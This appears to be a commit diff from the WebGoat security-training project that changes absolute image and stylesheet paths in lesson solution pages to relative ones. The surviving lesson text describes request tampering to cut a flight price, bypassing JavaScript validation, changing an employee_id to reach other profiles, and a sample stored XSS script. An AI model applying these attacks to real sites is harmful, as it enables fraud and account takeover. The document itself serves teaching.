<link rel=File-List href="/WebGoat/lesson_solutions/JSONInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/JSONInjection_files/editdata.mso">
<link rel=File-List href="lesson_solutions/JSONInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/JSONInjection_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/JSONInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/JSONInjection_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/JSONInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/JSONInjection_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -670,9 +670,9 @@ yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_77" o:spid="_x0000_i1030" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JSONInjection_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/JSONInjection_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/JSONInjection_files/image013.jpg" v:shapes="Picture_x0020_77"><![endif]></span></p>
src="lesson_solutions/JSONInjection_files/image013.jpg" v:shapes="Picture_x0020_77"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -702,9 +702,9 @@ bold'><o:p>&nbsp;</o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_78"
o:spid="_x0000_i1029" type="#_x0000_t75" style='width:481.5pt;height:345pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JSONInjection_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/JSONInjection_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/JSONInjection_files/image014.jpg" v:shapes="Picture_x0020_78"><![endif]></span></p>
src="lesson_solutions/JSONInjection_files/image014.jpg" v:shapes="Picture_x0020_78"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -718,9 +718,9 @@ field-end'></span><![endif]--> Intercept HTTP Request</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_79" o:spid="_x0000_i1028"
type="#_x0000_t75" style='width:481.5pt;height:345pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JSONInjection_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/JSONInjection_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/JSONInjection_files/image015.jpg" v:shapes="Picture_x0020_79"><![endif]></span></p>
src="lesson_solutions/JSONInjection_files/image015.jpg" v:shapes="Picture_x0020_79"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -741,9 +741,9 @@ price for the expensive flight of $600 to $100 and click "Accept changes".<o:p><
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_80" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:481.5pt;height:345pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JSONInjection_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/JSONInjection_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/JSONInjection_files/image016.jpg" v:shapes="Picture_x0020_80"><![endif]></span></p>
src="lesson_solutions/JSONInjection_files/image016.jpg" v:shapes="Picture_x0020_80"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -757,9 +757,9 @@ field-end'></span><![endif]--> Updated price</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_81" o:spid="_x0000_i1026"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JSONInjection_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/JSONInjection_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/JSONInjection_files/image017.jpg" v:shapes="Picture_x0020_81"><![endif]></span></p>
src="lesson_solutions/JSONInjection_files/image017.jpg" v:shapes="Picture_x0020_81"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -778,9 +778,9 @@ with no stops and the updated price and click "Submit".<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_82"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JSONInjection_files/image011.png" o:title=""/>
<v:imagedata src="lesson_solutions/JSONInjection_files/image011.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/JSONInjection_files/image018.jpg" v:shapes="Picture_x0020_82"><![endif]></span></p>
src="lesson_solutions/JSONInjection_files/image018.jpg" v:shapes="Picture_x0020_82"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

54
webgoat/main/project/WebContent/lesson_solutions/JavaScriptValidation.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/JavaScriptValidation_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/JavaScriptValidation_files/editdata.mso">
<link rel=File-List href="lesson_solutions/JavaScriptValidation_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/JavaScriptValidation_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/JavaScriptValidation_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/JavaScriptValidation_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/JavaScriptValidation_files/colorschememapping.xml">
href="lesson_solutions/JavaScriptValidation_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -573,9 +573,9 @@ yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_176" o:spid="_x0000_i1035" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image002.jpg" v:shapes="Picture_x0020_176"><![endif]></span><span
src="lesson_solutions/JavaScriptValidation_files/image002.jpg" v:shapes="Picture_x0020_176"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal style='page-break-after:avoid'><o:p>&nbsp;</o:p></p>
@ -605,9 +605,9 @@ normal'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span><
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_177"
o:spid="_x0000_i1034" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image004.jpg" v:shapes="Picture_x0020_177"><![endif]></span></p>
src="lesson_solutions/JavaScriptValidation_files/image004.jpg" v:shapes="Picture_x0020_177"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -626,9 +626,9 @@ symbols to the fields and click "Accept changes".<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_178"
o:spid="_x0000_i1033" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image006.jpg" v:shapes="Picture_x0020_178"><![endif]></span></p>
src="lesson_solutions/JavaScriptValidation_files/image006.jpg" v:shapes="Picture_x0020_178"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -642,9 +642,9 @@ field-end'></span><![endif]--> Change parameters<span style='font-family:"Arial"
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_179"
o:spid="_x0000_i1032" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image008.jpg" v:shapes="Picture_x0020_179"><![endif]></span><span
src="lesson_solutions/JavaScriptValidation_files/image008.jpg" v:shapes="Picture_x0020_179"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
@ -673,13 +673,13 @@ Validation" and intercept the response in WebScarab.<o:p></o:p></span></p>
width:82.65pt;height:27pt;z-index:1' filled="f" strokecolor="red"/><![endif]--><![if !vml]><span
style='mso-ignore:vglayout;position:absolute;z-index:1;margin-left:314px;
margin-top:9px;width:113px;height:38px'><img width=113 height=38
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image009.gif" v:shapes="_x0000_s1026"></span><![endif]><span
src="lesson_solutions/JavaScriptValidation_files/image009.gif" v:shapes="_x0000_s1026"></span><![endif]><span
style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape
id="Picture_x0020_180" o:spid="_x0000_i1031" type="#_x0000_t75" style='width:480pt;
height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image010.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image010.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image011.jpg" v:shapes="Picture_x0020_180"><![endif]></span></p>
src="lesson_solutions/JavaScriptValidation_files/image011.jpg" v:shapes="Picture_x0020_180"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -694,9 +694,9 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_181"
o:spid="_x0000_i1030" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image012.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image012.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image013.jpg" v:shapes="Picture_x0020_181"><![endif]></span></p>
src="lesson_solutions/JavaScriptValidation_files/image013.jpg" v:shapes="Picture_x0020_181"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -719,9 +719,9 @@ validate() Javascript function in the HTML page.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_182"
o:spid="_x0000_i1029" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image014.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image014.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image015.jpg" v:shapes="Picture_x0020_182"><![endif]></span></p>
src="lesson_solutions/JavaScriptValidation_files/image015.jpg" v:shapes="Picture_x0020_182"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -740,9 +740,9 @@ expressions will remove the Javascript validation and submit the form.<o:p></o:p
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_183"
o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image016.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image016.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image017.jpg" v:shapes="Picture_x0020_183"><![endif]></span></p>
src="lesson_solutions/JavaScriptValidation_files/image017.jpg" v:shapes="Picture_x0020_183"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -763,9 +763,9 @@ expression checks.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_184"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image018.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image018.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image019.jpg" v:shapes="Picture_x0020_184"><![endif]></span></p>
src="lesson_solutions/JavaScriptValidation_files/image019.jpg" v:shapes="Picture_x0020_184"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -784,9 +784,9 @@ fields in the HTML page to contain symbols like @#@@# and click "Submit". <o:p><
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_185"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image020.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image020.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image021.jpg" v:shapes="Picture_x0020_185"><![endif]></span><span
src="lesson_solutions/JavaScriptValidation_files/image021.jpg" v:shapes="Picture_x0020_185"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
@ -803,9 +803,9 @@ style='font-family:"Arial","sans-serif"'> No more regular expression checks<o:p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_186"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image022.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image022.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image023.jpg" v:shapes="Picture_x0020_186"><![endif]></span><span
src="lesson_solutions/JavaScriptValidation_files/image023.jpg" v:shapes="Picture_x0020_186"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span

2
webgoat/main/project/WebContent/lesson_solutions/Lab Access Control/Lab Add Business Layer Access Control.html
View File

@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Role Based Access Control Stage2</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>

2
webgoat/main/project/WebContent/lesson_solutions/Lab Access Control/Lab Add Data Layer Access Control.html
View File

@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Role Based Access Control Stage4</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>

4
webgoat/main/project/WebContent/lesson_solutions/Lab Access Control/Lab Bypass Business Layer Access Control.html
View File

@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Role Based Access Control Stage1</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
@ -36,7 +36,7 @@ it because it has a really logical name.
But we will look it up. So your first step is to log in as John with john as
password. Use WebScarab to intercept the delete request.
<img src="/WebGoat/lesson_solutions/Lab Access Control/images/access_control_stage1.png" width=450px alt="deleteAction" />
<img src="lesson_solutions/Lab Access Control/images/access_control_stage1.png" width=450px alt="deleteAction" />
As you can see the delete action is called DeleteProfile.
Now log in as Tom. Click in the list on his name and make sure WebScarab

4
webgoat/main/project/WebContent/lesson_solutions/Lab Access Control/Lab Bypass Data Layer Access Control.html
View File

@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Role Based Access Control Stage3</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
@ -39,7 +39,7 @@ of another employee!
Log in as Tom with tom as password. Click on Tom's name in the list and make sure
webscarab will intercept the next request. Change the employee_id for example to 101.<br><br>
<img src="/WebGoat/lesson_solutions/Lab Access Control/images/access_control_stage1.png" width=450px alt="deleteAction" />
<img src="lesson_solutions/Lab Access Control/images/access_control_stage1.png" width=450px alt="deleteAction" />
</body>

2
webgoat/main/project/WebContent/lesson_solutions/Lab SQL Injection/Lab Numeric SQL Injection.html
View File

@ -4,7 +4,7 @@
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab SQL Injection Stage3</title>
<link rel="stylesheet" type="text/css"
href="/WebGoat/lesson_solutions/formate.css">
href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform a SQLInjection</p>

2
webgoat/main/project/WebContent/lesson_solutions/Lab SQL Injection/Lab Parameterized Query #1.html
View File

@ -4,7 +4,7 @@
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab SQL Injection Stage2</title>
<link rel="stylesheet" type="text/css"
href="/WebGoat/lesson_solutions/formate.css">
href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform a SQLInjection</p>

2
webgoat/main/project/WebContent/lesson_solutions/Lab SQL Injection/Lab Parameterized Query #2.html
View File

@ -4,7 +4,7 @@
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab SQL Injection Stage4</title>
<link rel="stylesheet" type="text/css"
href="/WebGoat/lesson_solutions/formate.css">
href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform a SQLInjection</p>

2
webgoat/main/project/WebContent/lesson_solutions/Lab SQL Injection/Lab String SQL Injection.html
View File

@ -4,7 +4,7 @@
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab SQL Injection Stage1</title>
<link rel="stylesheet" type="text/css"
href="/WebGoat/lesson_solutions/formate.css">
href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform a SQLInjection</p>

2
webgoat/main/project/WebContent/lesson_solutions/Lab XSS/Lab Block Reflected XSS.html
View File

@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Block Stored XSS</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>

2
webgoat/main/project/WebContent/lesson_solutions/Lab XSS/Lab Block Stored XSS using Input Validation.html
View File

@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Block Stored XSS</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>

2
webgoat/main/project/WebContent/lesson_solutions/Lab XSS/Lab Block Stored XSS using Output Encoding.html
View File

@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Block Stored XSS</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>

2
webgoat/main/project/WebContent/lesson_solutions/Lab XSS/Lab Reflected XSS.html
View File

@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Block Stored XSS</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>

2
webgoat/main/project/WebContent/lesson_solutions/Lab XSS/Lab Stored XSS Revisited.html
View File

@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Block Stored XSS</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>

4
webgoat/main/project/WebContent/lesson_solutions/Lab XSS/Lab Stored XSS.html
View File

@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Block Stored XSS</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
@ -24,7 +24,7 @@ For example: &lt;script&gt;alert("Got Ya");&lt;/script&gt;<br/>
Click on the UpdateProfile Button and Log out.</p><p>
<p>
<img src="/WebGoat/lesson_solutions/Lab XSS/images/stored_xss.png" width=450px alt="stored_xss.png" />
<img src="lesson_solutions/Lab XSS/images/stored_xss.png" width=450px alt="stored_xss.png" />
<p>
Now log in as Jerry with jerry as password. Select from the the list the profile of tom and hit the

20
webgoat/main/project/WebContent/lesson_solutions/LogSpoofing.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/LogSpoofing_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/LogSpoofing_files/editdata.mso">
<link rel=File-List href="lesson_solutions/LogSpoofing_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/LogSpoofing_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/LogSpoofing_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/LogSpoofing_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/LogSpoofing_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/LogSpoofing_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -692,9 +692,9 @@ style='mso-spacerun:yes'>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_135" o:spid="_x0000_i1027" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/LogSpoofing_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/LogSpoofing_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/LogSpoofing_files/image007.jpg" v:shapes="Picture_x0020_135"><![endif]></span></p>
src="lesson_solutions/LogSpoofing_files/image007.jpg" v:shapes="Picture_x0020_135"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -725,9 +725,9 @@ bold'><o:p>&nbsp;</o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_136"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/LogSpoofing_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/LogSpoofing_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/LogSpoofing_files/image008.jpg" v:shapes="Picture_x0020_136"><![endif]></span></p>
src="lesson_solutions/LogSpoofing_files/image008.jpg" v:shapes="Picture_x0020_136"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -759,9 +759,9 @@ bold'><o:p>&nbsp;</o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_137"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
